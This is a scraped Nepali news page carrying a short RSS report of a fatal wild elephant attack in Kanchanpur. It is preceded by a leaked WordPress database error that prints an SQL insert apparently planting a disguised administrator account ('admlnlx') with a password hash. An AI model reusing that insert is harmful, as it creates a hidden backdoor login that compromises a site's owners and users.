WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BE6FpcVo.Nt3kQ1l1Ja8P4y.pixsZd0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-05 13:07:28', '', 'admlnlx', 'admlnlx')
कञ्चनपुर, माघ २१-
जङ्गली हात्तीको आक्रमणमा परी कञ्चनपुरको पुर्नवास नगरपालिका– १ बिचफाँटाका ६० वर्षीय मानबहादुर सुनारको आज बिहान मृत्यु भएको छ ।
भारतीय दूधुवा नेसनल पार्कबाट आएको हात्तीको बथानले आक्रमण गर्दा सुनारको घटनास्थलमै मृत्यु भएको इलाका प्रहरी कार्यालय त्रिभुवनबस्तीका प्रहरी निरीक्षक दलराम टमाटाले बताउनुभयो । उहाँका अनुसार रोजगारका लागि बिहानै भारततिर गइरहेको बेला हात्तीले उनीमाथि आक्रमण गरेको थियो । सुनारसँगै रहेका अन्यले भने भागेर ज्यान जोगाएका थिए ।
हात्तीको आक्रमणबाट यसअघि एकजना महिलाको मृत्यु भएको थियो ।- रासस